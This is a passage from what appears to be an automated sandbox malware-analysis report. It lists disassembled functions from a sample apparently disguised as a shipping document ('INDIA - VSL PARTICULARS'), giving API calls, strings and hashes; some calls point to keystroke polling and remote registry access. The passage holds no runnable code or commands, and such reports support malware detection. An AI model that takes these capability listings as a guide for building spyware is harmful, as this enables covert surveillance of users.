                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                              • CLSIDFromString.OLE32(?,?), ref: 004587B3
                              • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                              • RegCloseKey.ADVAPI32(?), ref: 004587C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                              • API String ID: 600699880-22481851
                              • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                              • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                              • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                              • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                              Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DestroyWindow
                              • String ID: static
                              • API String ID: 3375834691-2160076837
                              • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                              • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                              • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                              • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                              Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$DriveType
                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                              • API String ID: 2907320926-3566645568
                              • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                              • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                              • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                              • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                              Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                              • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                              • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                              • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                              • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                              • DeleteObject.GDI32(00730000), ref: 00470A04
                              • DestroyIcon.USER32(00720065), ref: 00470A1C
                              • DeleteObject.GDI32(2E20EE42), ref: 00470A34
                              • DestroyWindow.USER32(00000073), ref: 00470A4C
                              • DestroyIcon.USER32(?), ref: 00470A73
                              • DestroyIcon.USER32(?), ref: 00470A81
                              • KillTimer.USER32(00000000,00000000), ref: 00470B00
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                              • String ID:
                              • API String ID: 1237572874-0
                              • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                              • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                              • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                              • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                              Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                              • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                              • VariantInit.OLEAUT32(?), ref: 004793E1
                              • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                              • VariantCopy.OLEAUT32(?,?), ref: 00479461
                              • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                              • VariantClear.OLEAUT32(?), ref: 00479489
                              • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                              • VariantClear.OLEAUT32(?), ref: 004794CA
                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                              • String ID:
                              • API String ID: 2706829360-0
                              • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                              • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                              • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                              • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                              Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044480E
                              • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                              • GetKeyState.USER32(000000A0), ref: 004448AA
                              • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                              • GetKeyState.USER32(000000A1), ref: 004448D9
                              • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                              • GetKeyState.USER32(00000011), ref: 00444903
                              • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                              • GetKeyState.USER32(00000012), ref: 0044492D
                              • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                              • GetKeyState.USER32(0000005B), ref: 00444958
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                              • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                              • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                              • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                              Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                              • String ID:
                              • API String ID: 3413494760-0
                              • Opcode ID: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                              • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                              • Opcode Fuzzy Hash: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                              • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                              Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressProc_free_malloc$_strcat_strlen
                              • String ID: AU3_FreeVar
                              • API String ID: 2634073740-771828931
                              • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                              • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                              • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                              • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                              Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                              Download Yara Rule
                              APIs
                              • CoInitialize.OLE32 ref: 0046C63A
                              • CoUninitialize.OLE32 ref: 0046C645
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                              • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                              • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                              • IIDFromString.OLE32(?,?), ref: 0046C705
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                              • API String ID: 2294789929-1287834457
                              • Opcode ID: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                              • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                              • Opcode Fuzzy Hash: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                              • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                              Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                              • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                              • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                              • ImageList_EndDrag.COMCTL32 ref: 00471169
                              • ReleaseCapture.USER32 ref: 0047116F
                              • SetWindowTextW.USER32(?,00000000), ref: 00471206
                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                              • API String ID: 2483343779-2107944366
                              • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                              • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                              • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                              • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                              Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                              • _wcslen.LIBCMT ref: 00450720
                              • _wcscat.LIBCMT ref: 00450733
                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$Window_wcscat_wcslen
                              • String ID: -----$SysListView32
                              • API String ID: 4008455318-3975388722
                              • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                              • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                              • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                              • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                              Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                              • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                              • GetParent.USER32 ref: 00469C98
                              • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                              • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                              • GetParent.USER32 ref: 00469CBC
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$CtrlParent$_memmove_wcslen
                              • String ID: ComboBox$ListBox
                              • API String ID: 2360848162-1403004172
                              • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                              • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                              • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                              • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                              Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                              • String ID:
                              • API String ID: 262282135-0
                              • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                              • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                              • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                              • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                              Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                              • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                              • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
